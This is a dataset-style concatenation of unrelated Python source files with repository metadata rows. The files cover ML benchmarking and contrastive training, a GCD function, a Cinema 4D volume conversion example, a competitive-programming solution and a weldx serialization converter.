model['samples'].append(sample)
model['mmds'].append(multi_mmd(sample, gt_sample).item())
print(f"{name+':':48} {model['mmds'][-1]:.5f} ({model['times'][-1]:.3f}s)")
# Print averaged results
print('\nAverage over all runs:')
for name, model in unconditional_models.items():
print(f"{name+':':45} {np.mean(model['mmds']):.5f} ({np.mean(model['times']):.3f}s)")
# Save results for later plotting
dump = {name: {'times': model['times'], 'mmds': model['mmds']} for (name, model) in unconditional_models.items()}
with open(f'abc/{data_model.name}_unconditional_comparison_{run}.pkl', 'wb') as f:
pickle.dump(dump, f)
def compare_conditional(data_model, n_runs=1000, sample_size=4000):
# Load data
x, y = np.load(f'abc/{data_model.name}_x_huge.npy'), np.load(f'abc/{data_model.name}_y_huge.npy')
# Prepare lists
for model in conditional_models.values():
model['samples'] = []
model['times'] = []
model['mmds'] = []
model['dists'] = []
# Perform runs
for i in range(n_runs):
# Rejection sample to compare against
try:
with open(f'abc/{data_model.name}/{i:05}.pkl', 'rb') as f:
y_target, gt_sample, threshold = pickle.load(f)
assert gt_sample.shape[0] >= sample_size
except:
if not os.path.exists(f'abc/{data_model.name}'):
os.mkdir(f'abc/{data_model.name}')
y_target = data_model.forward_process(data_model.sample_prior(1)).astype(np.float32)
gt_sample, threshold = quantile_ABC(x, y, y_target, n=sample_size)
with open(f'abc/{data_model.name}/{i:05}.pkl', 'wb') as f:
pickle.dump((y_target, gt_sample, threshold), f)
print(f'\nRun {i+1:04}/{n_runs:04} | y = {np.round(y_target[0], 3)}:')
gt_sample = torch.from_numpy(gt_sample).cuda()
# Shared latent sample and target observation for all models
z_sample = torch.cuda.FloatTensor(sample_size, data_model.n_parameters).normal_()
y_target = torch.tensor(y_target).expand(sample_size, data_model.n_observations).cuda()
# Generate samples from all models
with torch.no_grad():
for name, model in conditional_models.items():
t = time.time()
sample = model['inverse'](y_target, z_sample)
model['times'].append(time.time() - t)
model['samples'].append(sample)
model['mmds'].append(multi_mmd(sample, gt_sample).item())
model['dists'].append(mean_target_distance(data_model, y_target, sample).item())
print(f"{name+':':46} {model['mmds'][-1]:.5f} {model['dists'][-1]:.5f} ({model['times'][-1]:.3f}s)")
# Print averaged results
print('\nAverage over all runs:')
for name, model in conditional_models.items():
print(f"{name+':':45} {np.mean(model['mmds']):.5f} {np.mean(model['dists']):.5f} ({np.mean(model['times']):.3f}s)")
# Save results for later plotting
dump = {name: {'times': model['times'], 'mmds': model['mmds'], 'dists': model['dists']} for (name, model) in conditional_models.items()}
with open(f'abc/{data_model.name}_conditional_comparison_{run}.pkl', 'wb') as f:
pickle.dump(dump, f)
def accumulate_metrics_unconditional():
mmds = {'fourier-curve_unconditional_inn-1':[], 'fourier-curve_unconditional_inn-2':[], 'fourier-curve_unconditional_hint-1-full':[], 'fourier-curve_unconditional_hint-2-full':[]}
for i in range(5):
with open(f'abc/fourier-curve_unconditional_comparison_{i+1}.pkl', 'rb') as f:
d = pickle.load(f)
for name, model in d.items():
# print(name, np.mean(model['mmds']), np.std(model['mmds']))
mmds[name].append(np.mean(model['mmds']))
for name in mmds.keys():
print(name)
print(np.mean(mmds[name]))
print(np.std(mmds[name]))
print()
def accumulate_metrics_conditional():
mmds = {'fourier-curve_conditional_cinn-1':[], 'fourier-curve_conditional_cinn-2':[], 'fourier-curve_conditional_cinn-4':[], 'fourier-curve_conditional_cinn-8':[], 'fourier-curve_conditional_hint-1-full':[], 'fourier-curve_conditional_hint-2-full':[], 'fourier-curve_conditional_hint-4-full':[], 'fourier-curve_conditional_hint-8-full':[]}
for i in range(3):
with open(f'abc/fourier-curve_conditional_comparison_{i+1}.pkl', 'rb') as f:
d = pickle.load(f)
for name, model in d.items():
# print(name, np.mean(model['mmds']), np.std(model['mmds']))
mmds[name].append(np.mean(model['mmds']))
for name in mmds.keys():
print(name)
print(f'{np.nanmean(mmds[name]):.4f} \pm {np.nanstd(mmds[name]):.4f}')
print()
if __name__ == '__main__':
    prepare_samples(FourierCurveModel())
# compare_conditional(FourierCurveModel())
# accumulate_metrics_conditional()
# compare_unconditional(FourierCurveModel())
# accumulate_metrics_unconditional()
| 46.349754 | 343 | 0.61675 | 1,344 | 9,409 | 4.164435 | 0.162202 | 0.027336 | 0.012864 | 0.020904 | 0.515276 | 0.444345 | 0.414686 | 0.366089 | 0.327497 | 0.296409 | 0 | 0.02009 | 0.20119 | 9,409 | 202 | 344 | 46.579208 | 0.724588 | 0.197896 | 0 | 0.302158 | 0 | 0.05036 | 0.248802 | 0.166534 | 0 | 0 | 0 | 0 | 0.007194 | 1 | 0.057554 | false | 0.007194 | 0.064748 | 0 | 0.143885 | 0.136691 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e894776f624d458e4e3df53378bd8c2742eeaf87 | 260 | py | Python | GCD/3.py | suraj588/DSA-in-Python | 2fe4b47b07050dcae031a0d5d070692655b2932a | [
"MIT"
] | null | null | null | GCD/3.py | suraj588/DSA-in-Python | 2fe4b47b07050dcae031a0d5d070692655b2932a | [
"MIT"
] | null | null | null | GCD/3.py | suraj588/DSA-in-Python | 2fe4b47b07050dcae031a0d5d070692655b2932a | [
"MIT"
] | null | null | null | # Constraint: m, n should be positive
def gcd(m, n):
    flag = 1  # 1 divides every pair of positive integers, so it is the fallback gcd
    for i in range(min(m, n), 1, -1):  # count down to 2 inclusive so even divisors are tested
        if (m % i == 0) and (n % i == 0):
            print(i)
            return i
    print(flag)
    return flag
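
# Minimal sanity check (illustrative addition, not part of the original solution):
if __name__ == "__main__":
    assert gcd(12, 18) == 6
    assert gcd(7, 5) == 1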
| 23.636364 | 75 | 0.496154 | 44 | 260 | 2.931818 | 0.590909 | 0.046512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 0.376923 | 260 | 10 | 76 | 26 | 0.759259 | 0.265385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.375 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8954f13b549078ebde97028074ebe54e8181316 | 3,457 | py | Python | scripts/05_modules/volume/volumetools_meshtovolume_volumetomesh_r20.py | mgoldshteyn/cinema4d_py_sdk_extended | b6c67f1dbae182c09ccbcc1df51f0e7ea4816074 | [
"Apache-2.0"
] | null | null | null | scripts/05_modules/volume/volumetools_meshtovolume_volumetomesh_r20.py | mgoldshteyn/cinema4d_py_sdk_extended | b6c67f1dbae182c09ccbcc1df51f0e7ea4816074 | [
"Apache-2.0"
] | null | null | null | scripts/05_modules/volume/volumetools_meshtovolume_volumetomesh_r20.py | mgoldshteyn/cinema4d_py_sdk_extended | b6c67f1dbae182c09ccbcc1df51f0e7ea4816074 | [
"Apache-2.0"
] | null | null | null | """
Copyright: MAXON Computer GmbH
Author: Maxime Adam
Description:
- Convert a Polygon Object to a Volume and convert it back to a Polygon Object
Class/method highlighted:
- Ovolume.SetVolume()
- maxon.frameworks.volume.VolumeConversionPolygon
- maxon.frameworks.volume.VolumeToolsInterface.MeshToVolume()
- maxon.frameworks.volume.VolumeToolsInterface.VolumeToMesh()
Compatible:
- Win / Mac
- R20, R21, S22
"""
import c4d
import maxon
from maxon.frameworks import volume
def main():
# Checks if there is an active object
if op is None:
raise ValueError("op is None, please select one object.")
# Checks if the input obj is a PolygonObject
if not op.IsInstanceOf(c4d.Opolygon):
raise TypeError("obj is not a c4d.Opolygon.")
# Retrieves the world matrices of the object
matrix = op.GetMg()
# Creates a BaseArray (list) of all points position in world space
vertices = maxon.BaseArray(maxon.Vector)
vertices.Resize(op.GetPointCount())
for i, pt in enumerate(op.GetAllPoints()):
vertices[i] = pt * matrix
# Sets polygons
polygons = maxon.BaseArray(maxon.frameworks.volume.VolumeConversionPolygon)
polygons.Resize(op.GetPolygonCount())
for i, poly in enumerate(op.GetAllPolygons()):
newPoly = maxon.frameworks.volume.VolumeConversionPolygon()
newPoly.a = poly.a
newPoly.b = poly.b
newPoly.c = poly.c
if poly.IsTriangle():
newPoly.SetTriangle()
else:
newPoly.d = poly.d
polygons[i] = newPoly
polygonObjectMatrix = maxon.Matrix()
gridSize = 10
bandWidthInterior = 1
bandWidthExterior = 1
# Converts the polygon into a volume
# Before R21
if c4d.GetC4DVersion() < 21000:
volumeRef = maxon.frameworks.volume.VolumeToolsInterface.MeshToVolume(vertices,
polygons, polygonObjectMatrix,
gridSize,
bandWidthInterior, bandWidthExterior,
maxon.ThreadRef(), None)
else:
volumeRef = maxon.frameworks.volume.VolumeToolsInterface.MeshToVolume(vertices,
polygons, polygonObjectMatrix,
gridSize,
bandWidthInterior, bandWidthExterior,
maxon.ThreadRef(),
maxon.POLYGONCONVERSIONFLAGS.NONE, None)
# Creates a Volume Object to store the previous volume calculated
volumeObj = c4d.BaseObject(c4d.Ovolume)
if volumeObj is None:
raise MemoryError("Failed to create a volume object.")
doc.InsertObject(volumeObj)
volumeObj.SetVolume(volumeRef)
# Converts back to Polygon
polyObject = maxon.frameworks.volume.VolumeToolsInterface.VolumeToMesh(volumeRef, 0.0, 1)
doc.InsertObject(polyObject)
# Pushes an update event to Cinema 4D
c4d.EventAdd()
if __name__ == '__main__':
main()
| 36.389474 | 118 | 0.562916 | 310 | 3,457 | 6.251613 | 0.409677 | 0.069659 | 0.086687 | 0.105779 | 0.239938 | 0.157895 | 0.157895 | 0.157895 | 0.157895 | 0.157895 | 0 | 0.013272 | 0.367949 | 3,457 | 94 | 119 | 36.776596 | 0.873684 | 0.233729 | 0 | 0.192308 | 0 | 0 | 0.039514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019231 | false | 0 | 0.057692 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e895b8d6da905ee2ccb3d3f6cf10e14062564091 | 294 | py | Python | submissions/abc071/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | 1 | 2021-05-10T01:16:28.000Z | 2021-05-10T01:16:28.000Z | submissions/abc071/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | 3 | 2021-05-11T06:14:15.000Z | 2021-06-19T08:18:36.000Z | submissions/abc071/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | null | null | null | import sys
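# ABC071 B: print the lexicographically smallest lowercase letter missing from the
# input string, or 'None' when all 26 letters appear.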
s = list(input())
set_s = set(s)
new_s = list(set_s)
new_s.sort()
for i in range(26):
if ord(new_s[i]) != 97+i:
print(chr(97+i))
sys.exit()
if len(new_s) == i+1:
if i == 25:
break
print(chr(98+i))
sys.exit()
print('None')
| 17.294118 | 29 | 0.493197 | 53 | 294 | 2.622642 | 0.471698 | 0.115108 | 0.100719 | 0.115108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055276 | 0.323129 | 294 | 16 | 30 | 18.375 | 0.643216 | 0 | 0 | 0.133333 | 0 | 0 | 0.013605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8976d3c3733f057c3b67ec7ca4bab4b95799582 | 17,104 | py | Python | main_joint_domain_blanced.py | bomtorazek/SupContrast | 943d1157d38136f9df55418e0b44fbc60744b142 | [
"BSD-2-Clause"
] | null | null | null | main_joint_domain_blanced.py | bomtorazek/SupContrast | 943d1157d38136f9df55418e0b44fbc60744b142 | [
"BSD-2-Clause"
] | null | null | null | main_joint_domain_blanced.py | bomtorazek/SupContrast | 943d1157d38136f9df55418e0b44fbc60744b142 | [
"BSD-2-Clause"
] | 1 | 2021-06-18T14:50:23.000Z | 2021-06-18T14:50:23.000Z | from __future__ import print_function
import os
import sys
import time
import tensorboard_logger as tb_logger
import torch
import torch.backends.cudnn as cudnn
from torch.utils import data
from torch.utils.data import dataset
from torchvision import transforms, datasets
from torch.nn.functional import normalize
from sklearn.metrics import roc_auc_score
import numpy as np
from util import TwoCropTransform, AverageMeter
from util import adjust_learning_rate, warmup_learning_rate,accuracy, best_accuracy
from util import set_optimizer, save_model
from networks.resnet_big import SupHybResNet
from losses import SupConLoss, CrossSupConLoss
from config import parse_option
from datasets.general_dataset import GeneralDataset
# from torchsampler import ImbalancedDatasetSampler
from util import load_image_names
try:
import apex
from apex import amp, optimizers
except ImportError:
pass
def set_loader(opt):
# construct data loader
if opt.dataset == 'cifar10':
mean = (0.4914, 0.4822, 0.4465)
std = (0.2023, 0.1994, 0.2010)
scale = (0.2, 1.)
elif opt.dataset == 'cifar100':
mean = (0.5071, 0.4867, 0.4408)
std = (0.2675, 0.2565, 0.2761)
scale = (0.2, 1.)
elif opt.dataset == 'path':
mean = eval(opt.mean)
std = eval(opt.std)
scale = (0.2, 1.)
else:
mean = (0.485, 0.456, 0.406)
std = (0.229, 0.224, 0.225)
scale = (0.875, 1.)
normalize = transforms.Normalize(mean=mean, std=std)
train_transform = transforms.Compose([
transforms.RandomResizedCrop(size=opt.size, scale= scale),
transforms.RandomHorizontalFlip(),
transforms.RandomApply([
transforms.ColorJitter(0.4, 0.4, 0.4, 0.1)
], p=0.8),
transforms.RandomGrayscale(p=0.2),
transforms.ToTensor(),
normalize,
])
test_transform = val_transform = transforms.Compose([
transforms.Resize(opt.size),
transforms.ToTensor(),
normalize,
])
if opt.method == 'Joint_Con':
train_transform =TwoCropTransform(train_transform)
elif opt.method == 'Joint_CE':
pass
else:
raise ValueError("check method")
# dataset
custom = False
if opt.dataset == 'cifar10':
train_dataset = datasets.CIFAR10(root=opt.data_folder,
transform=train_transform,
download=True)
elif opt.dataset == 'cifar100':
train_dataset = datasets.CIFAR100(root=opt.data_folder,
transform=train_transform,
download=True)
elif opt.dataset == 'path':
train_dataset = datasets.ImageFolder(root=opt.data_folder,
transform=train_transform)
else:
train_names_S, _, _ = load_image_names(opt.source_data_folder, 1.0, opt)
train_names_T, val_names_T, test_names_T = load_image_names(opt.data_folder, opt.train_util_rate,opt)
train_dataset_S = GeneralDataset(data_dir=opt.source_data_folder, image_names=train_names_S,
transform=train_transform)
train_dataset_T = GeneralDataset(data_dir=opt.data_folder, image_names=train_names_T,
transform=train_transform)
val_dataset_T = GeneralDataset(data_dir=opt.data_folder, image_names=val_names_T,
transform=val_transform,)
test_dataset_T = GeneralDataset(data_dir=opt.data_folder, image_names=test_names_T,
transform=test_transform)
custom = True
# dataloader
if custom:
train_loader_S = torch.utils.data.DataLoader(
train_dataset_S, batch_size=opt.batch_size, shuffle= True,
num_workers=opt.num_workers, pin_memory=True, sampler=None, drop_last = True)
train_loader_T = torch.utils.data.DataLoader(
train_dataset_T, batch_size=opt.batch_size, shuffle= True,
num_workers=opt.num_workers, pin_memory=True, sampler=None, drop_last = True)
val_loader_T = torch.utils.data.DataLoader(
val_dataset_T, batch_size=opt.batch_size, shuffle= False,
num_workers=opt.num_workers, pin_memory=True, sampler=None)
test_loader_T = torch.utils.data.DataLoader(
test_dataset_T, batch_size=opt.batch_size, shuffle= False,
num_workers=opt.num_workers, pin_memory=True, sampler=None)
return {'train_S': train_loader_S, 'train_T': train_loader_T, 'val': val_loader_T, 'test': test_loader_T}
else:
train_sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=opt.batch_size, shuffle=(train_sampler is None),
num_workers=opt.num_workers, pin_memory=True, sampler=train_sampler)
return train_loader
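
# Note (inferred from the branches above): for the custom dataset case set_loader returns a
# dict of loaders keyed 'train_S', 'train_T', 'val' and 'test'; the torchvision branches
# return a single train loader.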
def set_model(opt):
model = SupHybResNet(name=opt.model, num_classes=opt.num_cls)
if opt.method == 'Joint_Con':
criterion = {}
criterion['Cross'] = CrossSupConLoss(temperature=opt.temp)
criterion['Con'] = SupConLoss(temperature=opt.temp)
criterion['CE'] = torch.nn.CrossEntropyLoss()
elif opt.method == 'Joint_CE':
criterion = torch.nn.CrossEntropyLoss()
else:
raise ValueError("check method")
if opt.model_transfer is not None:
pretrained_dict = torch.load(opt.model_transfer)['model']
model_dict = model.state_dict()
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict)
# enable synchronized Batch Normalization
if opt.syncBN:
model = apex.parallel.convert_syncbn_model(model)
if torch.cuda.is_available():
if torch.cuda.device_count() > 1:
model.encoder = torch.nn.DataParallel(model.encoder)
model = model.cuda()
if opt.method == 'Joint_Con':
criterion['CE']=criterion['CE'].cuda()
criterion['Cross']=criterion['Cross'].cuda()
criterion['Con']=criterion['Con'].cuda()
elif opt.method == 'Joint_CE':
criterion = criterion.cuda()
else:
raise ValueError("check method")
cudnn.benchmark = True
return model, criterion
def train(train_S, train_T, model, criterion, optimizer, epoch, opt):
"""one epoch training"""
model.train()
batch_time = AverageMeter()
data_time = AverageMeter()
losses_CE = AverageMeter()
top1 = AverageMeter()
if opt.method == 'Joint_Con':
losses_Con_TT = AverageMeter()
losses_Con_SS = AverageMeter()
losses_Con_TS = AverageMeter()
losses_Con_ST = AverageMeter()
end = time.time()
source_iter = iter(train_S)
target_iter = iter(train_T)
for idx in range(len(train_T)):
        try:  # guard against either loader being exhausted mid-epoch
            images_S, labels_S = next(source_iter)
        except StopIteration:
            source_iter = iter(train_S)
            images_S, labels_S = next(source_iter)
        try:
            images_T, labels_T = next(target_iter)
        except StopIteration:
            target_iter = iter(train_T)
            images_T, labels_T = next(target_iter)
data_time.update(time.time() - end)
bsz = labels_T.shape[0]
if opt.method == 'Joint_CE':
bsz_T = images_T.shape[0]
images_S =images_S[:bsz_T]
images = torch.cat([images_T, images_S], dim=0)
labels = torch.cat([labels_T, labels_S], dim=0)
images = images.cuda(non_blocking=True)
labels = labels.cuda(non_blocking=True)
# warm-up learning rate
warmup_learning_rate(opt, epoch, idx, len(train_T), optimizer)
# compute loss
_, output = model(images)
loss_CE = criterion(output, labels)
elif opt.method == 'Joint_Con':
img_T = torch.cat([images_T[0], images_T[1]], dim=0)
bsz_T = images_T[0].shape[0]
img_S = torch.cat([images_S[0][:bsz_T], images_S[1][:bsz_T]], dim=0)
labels = torch.cat([labels_T, labels_T,labels_S[:bsz_T],labels_S[:bsz_T]], dim=0)
images = torch.cat([img_T, img_S], dim=0)
# TTSS
images = images.cuda(non_blocking=True)
labels_T = labels_T.cuda(non_blocking=True)
labels_S = labels_S[:bsz_T].cuda(non_blocking=True)
labels = labels.cuda(non_blocking=True)
# warm-up learning rate
warmup_learning_rate(opt, epoch, idx, len(train_T), optimizer)
# compute loss
features, output = model(images)
if opt.head == 'mlp':
f1_T, f2_T, f1_S, f2_S = torch.split(features, [bsz_T, bsz_T, bsz_T, bsz_T], dim=0)
elif opt.head == 'fc':
f1_T, f2_T, f1_S, f2_S = torch.split(normalize(output,dim=1), [bsz_T, bsz_T, bsz_T, bsz_T], dim=0)
features_T = torch.cat([f1_T.unsqueeze(1), f2_T.unsqueeze(1)], dim=1)
features_S = torch.cat([f1_S.unsqueeze(1), f2_S.unsqueeze(1)], dim=1)
#make new dimension and concat by that dimension.
loss_Con_TT = criterion['Con'](features_T, labels_T)
loss_Con_SS = criterion['Con'](features_S, labels_S)
loss_Con_TS = criterion['Cross'](features_T,features_S, labels_T, labels_S)
loss_Con_ST = criterion['Cross'](features_S,features_T, labels_S, labels_T)
loss_CE = criterion['CE'](output, labels)
loss_Con = loss_Con_TT + loss_Con_SS + loss_Con_TS + loss_Con_ST
# update metric
losses_CE.update(loss_CE.item(), bsz)
if opt.method == 'Joint_Con':
losses_Con_TT.update(loss_Con_TT.item(), bsz)
losses_Con_SS.update(loss_Con_SS.item(), bsz)
losses_Con_TS.update(loss_Con_TS.item(), bsz)
losses_Con_ST.update(loss_Con_ST.item(), bsz)
acc1, _ = accuracy(output[:2*bsz,:], labels[:2*bsz], topk=(1, 2))
else:
acc1, _ = accuracy(output[:bsz,:], labels[:bsz], topk=(1, 2))
top1.update(acc1[0], bsz)
# SGD
optimizer.zero_grad()
if opt.method == 'Joint_Con':
total_loss = loss_Con + loss_CE
total_loss.backward()
optimizer.step()
else:
loss_CE.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print info
# if idx == len(train_T)-1:
if idx % 1 == 0:
print('Train: [{0}][{1}/{2}]\t'
'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'DT {data_time.val:.3f} ({data_time.avg:.3f})\t'
'loss {loss.val:.3f} ({loss.avg:.3f})'.format(
epoch, idx + 1, len(train_T), batch_time=batch_time,
data_time=data_time, loss=losses_CE))
sys.stdout.flush()
if opt.method == 'Joint_Con':
return {'CE':losses_CE.avg, 'TT': losses_Con_TT.avg, 'SS':losses_Con_SS.avg, 'TS': losses_Con_TS.avg, 'ST': losses_Con_ST.avg}, top1.avg
else:
return losses_CE.avg, top1.avg
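
# Shape notes for the Joint_Con branch above (inferred from the code, for orientation):
# - images_T under TwoCropTransform is a pair of augmented views, so img_T stacks to (2*bsz_T, C, H, W)
# - model(images) returns (features, logits); features split into f1_T/f2_T/f1_S/f2_S, each (bsz_T, feat_dim)
# - features_T/features_S add a views axis of size 2 for the SupCon-style losses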
def validate(val_loader, model, criterion, opt):
"""validation"""
model.eval()
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
probs = []
gts = []
with torch.no_grad():
end = time.time()
for idx, (images, labels) in enumerate(val_loader):
images = images.float().cuda()
gts.extend(labels.tolist())
labels = labels.cuda()
bsz = labels.shape[0]
# forward
_, output = model(images)
prob = torch.nn.functional.softmax(output, dim=1)[:,1]
probs.extend(prob.tolist())
if opt.method == 'Joint_Con':
loss = criterion['CE'](output, labels)
else:
loss = criterion(output, labels)
# update metric
losses.update(loss.item(), bsz)
acc1, acc2 = accuracy(output, labels, topk=(1, 2))
top1.update(acc1[0], bsz)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if idx == len(val_loader)-1:
print('Val: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
idx, len(val_loader), batch_time=batch_time,
loss=losses, top1=top1))
gts = np.array(gts)
probs = np.array(probs)
print(probs)
auc = roc_auc_score(gts, probs)
best_acc, best_th = best_accuracy(gts,probs)
print('Val auc: {:.3f}'.format(auc), end = ' ')
print('Val acc: {:.3f}'.format(best_acc) )
return losses.avg, auc, best_acc, best_th
def test(test_loader, model, opt, best_th = None):
model.eval()
probs = []
gts = []
if best_th is None:
pretrained_dict = torch.load(os.path.join(
opt.save_folder, 'auc_best.pth'))['model']
model.load_state_dict(pretrained_dict)
else:
pretrained_dict = torch.load(os.path.join(
opt.save_folder, 'acc_best.pth'))['model']
model.load_state_dict(pretrained_dict)
with torch.no_grad():
for idx, (images, labels) in enumerate(test_loader):
images = images.float().cuda()
gts.extend(labels.tolist())
labels = labels.cuda()
# forward
_, output = model(images)
prob = torch.nn.functional.softmax(output, dim=1)[:,1]
probs.extend(prob.tolist())
gts = np.array(gts)
probs = np.array(probs)
if best_th is None:
auc = roc_auc_score(gts, probs)
return auc
else:
from sklearn.metrics import accuracy_score
acc = accuracy_score(gts, probs>=best_th)
return acc
def main():
    best_auc = 0.0
    best_acc = 0.0
    best_th = 0.5  # fallback threshold in case validation accuracy never improves
opt = parse_option()
os.environ["CUDA_VISIBLE_DEVICES"] = opt.gpu
# build data loader
loaders = set_loader(opt) # tuple or dict
# build model and criterion
model, criterion = set_model(opt)
# build optimizer
optimizer = set_optimizer(opt, model)
# tensorboard
logger = tb_logger.Logger(logdir=opt.tb_folder, flush_secs=2)
# training routine
for epoch in range(1, opt.epochs + 1):
adjust_learning_rate(opt, optimizer, epoch)
# train for one epoch
time1 = time.time()
loss, train_acc = train(loaders['train_S'], loaders['train_T'], model, criterion, optimizer, epoch, opt)
time2 = time.time()
print('epoch {}, total time {:.2f}'.format(epoch, time2 - time1))
# tensorboard logger
if opt.method == 'Joint_Con':
logger.log_value('train_loss_CE', loss['CE'], epoch)
logger.log_value('train_Con_TT', loss['TT'], epoch)
logger.log_value('train_Con_SS', loss['SS'], epoch)
logger.log_value('train_Con_TS', loss['TS'], epoch)
logger.log_value('train_Con_ST', loss['ST'], epoch)
else:
logger.log_value('train_loss', loss, epoch)
logger.log_value('train_acc', train_acc, epoch)
logger.log_value('learning_rate', optimizer.param_groups[0]['lr'], epoch)
# evaluation
val_loss, val_auc, val_acc, val_th = validate(loaders['val'], model, criterion, opt)
logger.log_value('val_loss', val_loss, epoch)
logger.log_value('val_auc', val_auc, epoch)
logger.log_value('val_acc', val_acc, epoch)
logger.log_value('val_th', val_th, epoch)
if val_auc > best_auc:
best_auc = val_auc
save_file = os.path.join(
opt.save_folder, 'auc_best.pth')
save_model(model, optimizer, opt, epoch, save_file)
if val_acc > best_acc:
best_acc = val_acc
best_th = val_th
save_file = os.path.join(
opt.save_folder, 'acc_best.pth')
save_model(model, optimizer, opt, epoch, save_file)
best_auc = test(loaders['test'], model, opt)
best_acc = test(loaders['test'], model, opt, best_th)
print('Test auc: {:.2f}'.format(best_auc), end = ' ')
print('Test acc: {:.2f}'.format(best_acc) ,end = ' ')
print('Test th: {:.2f}'.format(best_th) ,end = ' ')
import csv
with open("result.csv", "a") as file:
writer = csv.writer(file)
row = [opt.model_name, 'auc', best_auc, 'acc', best_acc, 'th', best_th]
writer.writerow(row)
if __name__ == '__main__':
main()
| 36.469083 | 144 | 0.59413 | 2,187 | 17,104 | 4.417924 | 0.138089 | 0.006624 | 0.020286 | 0.01656 | 0.378493 | 0.317429 | 0.25088 | 0.214552 | 0.188263 | 0.162699 | 0 | 0.019247 | 0.286132 | 17,104 | 468 | 145 | 36.547009 | 0.772072 | 0.034144 | 0 | 0.351955 | 0 | 0 | 0.057767 | 0.004308 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01676 | false | 0.005587 | 0.072626 | 0 | 0.111732 | 0.027933 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e899eb14b3bf3e25a924a0daacbca47f186a5969 | 1,532 | py | Python | weldx/tags/core/mathematical_expression.py | CagtayFabry/weldx | 463f949d4fa54b5edafa2268cb862716865a62c2 | [
"BSD-3-Clause"
] | null | null | null | weldx/tags/core/mathematical_expression.py | CagtayFabry/weldx | 463f949d4fa54b5edafa2268cb862716865a62c2 | [
"BSD-3-Clause"
] | 3 | 2022-03-06T00:22:32.000Z | 2022-03-27T00:23:51.000Z | weldx/tags/core/mathematical_expression.py | CagtayFabry/weldx | 463f949d4fa54b5edafa2268cb862716865a62c2 | [
"BSD-3-Clause"
] | null | null | null | import warnings
import sympy
from xarray import DataArray
from weldx.asdf.types import WeldxConverter
from weldx.constants import META_ATTR
from weldx.core import MathematicalExpression
__all__ = ["MathematicalExpression", "MathematicalExpressionConverter"]
class MathematicalExpressionConverter(WeldxConverter):
"""Serialization class for sympy style math expressions."""
name = "core/mathematical_expression"
version = "0.1.0"
types = [MathematicalExpression]
def to_yaml_tree(self, obj: MathematicalExpression, tag: str, ctx) -> dict:
"""Convert to python dict."""
parameters = {}
for k, v in obj.parameters.items():
if isinstance(v, DataArray):
if len(v.coords) > 0:
warnings.warn("Coordinates are dropped during serialization.")
dims = v.dims
v = v.data
setattr(v, META_ATTR, dict(dims=dims))
parameters[k] = v
return {"expression": obj.expression.__str__(), "parameters": parameters}
def from_yaml_tree(self, node: dict, tag: str, ctx):
"""Construct from tree."""
parameters = {}
for k, v in node["parameters"].items():
if hasattr(v, META_ATTR):
dims = getattr(v, META_ATTR)["dims"]
delattr(v, META_ATTR)
v = (v, dims)
parameters[k] = v
return MathematicalExpression(
sympy.sympify(node["expression"]), parameters=parameters
)
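
# Illustrative round trip (hypothetical values; tag and ctx are normally supplied by the
# asdf machinery rather than constructed by hand):
# expr = MathematicalExpression("a * x + b", parameters=dict(a=1.0, b=2.0))
# converter = MathematicalExpressionConverter()
# tree = converter.to_yaml_tree(expr, tag=MathematicalExpressionConverter.name, ctx=None)
# restored = converter.from_yaml_tree(tree, tag=MathematicalExpressionConverter.name, ctx=None)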
